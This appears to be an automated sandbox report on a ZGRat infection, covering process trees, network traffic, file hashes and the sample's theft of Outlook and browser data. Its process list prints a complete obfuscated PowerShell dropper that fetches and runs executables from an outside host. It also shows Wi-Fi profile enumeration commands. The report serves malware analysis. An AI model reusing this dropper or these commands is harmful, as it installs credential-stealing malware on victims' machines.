memory/4360-946-0x0000000000400000-0x0000000000578000-memory.dmp
memory/4360-948-0x00000000058B0000-0x0000000005916000-memory.dmp
memory/4360-947-0x00000000057A0000-0x0000000005832000-memory.dmp
memory/4360-945-0x0000000074910000-0x00000000750C0000-memory.dmp
memory/4360-949-0x0000000006530000-0x000000000653A000-memory.dmp
memory/2192-944-0x0000000074910000-0x00000000750C0000-memory.dmp
memory/4360-950-0x0000000007760000-0x00000000077B0000-memory.dmp
memory/4360-990-0x0000000074910000-0x00000000750C0000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\File1crypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\File1crypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2236 set thread context of 2348 | N/A | C:\Users\Admin\AppData\Roaming\File1crypt.exe | C:\Users\Admin\AppData\Roaming\File1crypt.exe |
| PID 3396 set thread context of 2112 | N/A | C:\Users\Admin\AppData\Roaming\File2crypt.exe | C:\Users\Admin\AppData\Roaming\File2crypt.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\File1crypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\File1crypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Files.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function bTBrpbwC($sLUJNuBgfBfA, $DKUZcAdbQOceyyJA){[IO.File]::WriteAllBytes($sLUJNuBgfBfA, $DKUZcAdbQOceyyJA)};function qMgSdvYIRRUSjZ($sLUJNuBgfBfA){if($sLUJNuBgfBfA.EndsWith((HEiDtQybOoyVmdi @(70951,71005,71013,71013))) -eq $True){rundll32.exe $sLUJNuBgfBfA }elseif($sLUJNuBgfBfA.EndsWith((HEiDtQybOoyVmdi @(70951,71017,71020,70954))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $sLUJNuBgfBfA}elseif($sLUJNuBgfBfA.EndsWith((HEiDtQybOoyVmdi @(70951,71014,71020,71010))) -eq $True){misexec /qn /i $sLUJNuBgfBfA}else{Start-Process $sLUJNuBgfBfA}};function qKOlApTVNWImMHKgKrr($HXvvEsCPxrUIJvZa){$HFhjjojUglemTDI = New-Object (HEiDtQybOoyVmdi @(70983,71006,71021,70951,70992,71006,71003,70972,71013,71010,71006,71015,71021));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$DKUZcAdbQOceyyJA = $HFhjjojUglemTDI.DownloadData($HXvvEsCPxrUIJvZa);return $DKUZcAdbQOceyyJA};function HEiDtQybOoyVmdi($neuW){$LuPJsyaVetOy=70905;$rnhDacIHSobOT=$Null;foreach($OQvtigeOZOgrvp in $neuW){$rnhDacIHSobOT+=[char]($OQvtigeOZOgrvp-$LuPJsyaVetOy)};return $rnhDacIHSobOT};function kISEaSmnymA(){$iKWnDWTBqeifbvN = $env:AppData + '\';$MdErWExzJnRFtj = $iKWnDWTBqeifbvN + 'Document.pdf';If(Test-Path -Path $MdErWExzJnRFtj){Invoke-Item $MdErWExzJnRFtj;}Else{ $QXivrbIwhnWacVVIbm = qKOlApTVNWImMHKgKrr (HEiDtQybOoyVmdi @(71009,71021,71021,71017,71020,70963,70952,70952,71014,71002,71008,71010,71004,70951,71017,71016,71010,71020,71016,71015,71021,71016,71016,71013,71027,70951,71004,71016,71014,70952,70973,71016,71004,71022,71014,71006,71015,71021,70951,71017,71005,71007));bTBrpbwC $MdErWExzJnRFtj $QXivrbIwhnWacVVIbm;Invoke-Item $MdErWExzJnRFtj;};$BzjEeQAv = $iKWnDWTBqeifbvN + 'File1crypt.exe'; if (Test-Path -Path $BzjEeQAv){qMgSdvYIRRUSjZ $BzjEeQAv;}Else{ $ELYbsewlypYz = qKOlApTVNWImMHKgKrr (HEiDtQybOoyVmdi 
@(71009,71021,71021,71017,71020,70963,70952,70952,71014,71002,71008,71010,71004,70951,71017,71016,71010,71020,71016,71015,71021,71016,71016,71013,71027,70951,71004,71016,71014,70952,70975,71010,71013,71006,70954,71004,71019,71026,71017,71021,70951,71006,71025,71006));bTBrpbwC $BzjEeQAv $ELYbsewlypYz;qMgSdvYIRRUSjZ $BzjEeQAv;}$kYEycGaL = $iKWnDWTBqeifbvN + 'File2crypt.exe'; if (Test-Path -Path $kYEycGaL){qMgSdvYIRRUSjZ $kYEycGaL;}Else{ $sEFREXgUWGLv = qKOlApTVNWImMHKgKrr (HEiDtQybOoyVmdi @(71009,71021,71021,71017,71020,70963,70952,70952,71014,71002,71008,71010,71004,70951,71017,71016,71010,71020,71016,71015,71021,71016,71016,71013,71027,70951,71004,71016,71014,70952,70975,71010,71013,71006,70955,71004,71019,71026,71017,71021,70951,71006,71025,71006));bTBrpbwC $kYEycGaL $sEFREXgUWGLv;qMgSdvYIRRUSjZ $kYEycGaL;};;;;}kISEaSmnymA;
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Document.pdf"
C:\Users\Admin\AppData\Roaming\File2crypt.exe
"C:\Users\Admin\AppData\Roaming\File2crypt.exe"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7976D2701938C143CEEE98EB0DBD760E --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7976D2701938C143CEEE98EB0DBD760E --renderer-client-id=2 
--mojo-platform-channel-handle=1664 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=98176EE9CEE33A0427A03A4DE26D771B --mojo-platform-channel-handle=1840 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=31B3ACEAC2102F4B7E0CEBE272B054CE --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=31B3ACEAC2102F4B7E0CEBE272B054CE --renderer-client-id=4 
--mojo-platform-channel-handle=2160 --allow-no-sandbox-job /prefetch:1
C:\Users\Admin\AppData\Roaming\File1crypt.exe
"C:\Users\Admin\AppData\Roaming\File1crypt.exe"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5E53667CAD71A60515A0E3471FB2C312 --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=65AE344A690A01991423F40BD6EDF808 --mojo-platform-channel-handle=2008 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BC1DB1F616B341ACA525D2BE32A5071A --mojo-platform-channel-handle=2108 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv apyXpiSGQEezF0sqZFyx6g.0.2
C:\Users\Admin\AppData\Roaming\File1crypt.exe
C:\Users\Admin\AppData\Roaming\File1crypt.exe
C:\Users\Admin\AppData\Roaming\File2crypt.exe
C:\Users\Admin\AppData\Roaming\File2crypt.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 172.67.162.192:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 192.162.67.172.in-addr.arpa | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 152.199.19.74:80 | | tcp |
| GB | 104.77.160.14:80 | | tcp |
| GB | 23.37.0.169:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 52.167.17.97:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 52.167.17.97:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 52.165.165.26:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 20.3.187.198:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 40.127.169.103:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 40.127.169.103:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 104.77.160.28:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| GB | 96.16.110.114:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 208.95.112.1:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 149.154.167.220:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 162.159.129.233:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 104.18.114.97:80 | | tcp |
| GB | 96.17.179.41:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 104.18.114.97:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 151.80.29.83:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 136.175.8.205:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 104.18.114.97:80 | | tcp |
| N/A | 162.159.129.233:443 | | tcp |
| GB | 96.16.110.114:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| GB | 96.16.110.114:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 52.111.229.19:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
Files
memory/4468-0-0x0000000004C00000-0x0000000004C36000-memory.dmp
memory/4468-3-0x0000000004D70000-0x0000000004D80000-memory.dmp
memory/4468-2-0x0000000004D70000-0x0000000004D80000-memory.dmp
memory/4468-1-0x0000000072170000-0x0000000072920000-memory.dmp
memory/4468-4-0x00000000053B0000-0x00000000059D8000-memory.dmp
memory/4468-6-0x0000000005B10000-0x0000000005B76000-memory.dmp
memory/4468-5-0x0000000005310000-0x0000000005332000-memory.dmp
memory/4468-12-0x0000000005B80000-0x0000000005BE6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uklsy1xw.nft.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4468-17-0x0000000005CF0000-0x0000000006044000-memory.dmp
memory/4468-18-0x00000000061A0000-0x00000000061BE000-memory.dmp
memory/4468-19-0x00000000061E0000-0x000000000622C000-memory.dmp
memory/4468-22-0x0000000006740000-0x0000000006762000-memory.dmp
memory/4468-23-0x0000000007A40000-0x0000000007FE4000-memory.dmp
memory/4468-21-0x00000000066D0000-0x00000000066EA000-memory.dmp
memory/4468-20-0x00000000073F0000-0x0000000007486000-memory.dmp
memory/4468-24-0x0000000008670000-0x0000000008CEA000-memory.dmp
C:\Users\Admin\AppData\Roaming\Document.pdf
| MD5 | 80a2593453c09724d152e841a3ff0865 |
| SHA1 | c73c293d18aac71c530d69ea03314f064f5c6386 |
| SHA256 | 71d885fd0734c915b43ed11d45750aa67c53a11d6a95c9c8323d9fd6e3b413cd |
| SHA512 | ff131d439c8e06a789fa82ab7d2640ba87ab03b165f6bbf0d8048baad81c797e45c96000312c37dd5d1a53a2996ce7d3b6ccab09470d52840e4e8344f5b04f67 |
C:\Users\Admin\AppData\Roaming\File1crypt.exe
| MD5 | d28d630260b12cffcaf5afbd3fcd488d |
| SHA1 | b5b2ffda8805165e393ed23fda6ee02b0de207a0 |
| SHA256 | 5515c692e4b0b0d99d139baf53394d4eb2e16b05a7a1c906e1406c207e21c5a0 |
| SHA512 | 81528282cee78b8fdbc795549131bfd2de9c6517664e12228a531999603d14c714faf644587e9618a147e96bf65950388d348c528875d56292d1b924c59cdba8 |
memory/2236-39-0x0000000000070000-0x00000000001B6000-memory.dmp
memory/2236-41-0x0000000004BC0000-0x0000000004BD0000-memory.dmp
memory/2236-43-0x0000000004CD0000-0x0000000004E06000-memory.dmp
memory/2236-47-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-51-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-57-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-63-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-69-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-75-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-81-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-83-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-79-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-85-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-89-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-91-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-93-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-95-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-87-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-97-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-77-0x0000000004CD0000-0x0000000004E01000-memory.dmp
memory/2236-99-0x0000000004CD0000-0x0000000004E01000-memory.dmp
C:\Users\Admin\AppData\Roaming\File2crypt.exe
| MD5 | 774c1a62c46b127185ce69e68b3eb323 |
| SHA1 | e3bdad0863ad95c1b21a86c4d510c85cae7020ec |
| SHA256 | 39818ea97715df3133afda16f56775e0f9928424e99f98e99557bd9b4cb12b54 |
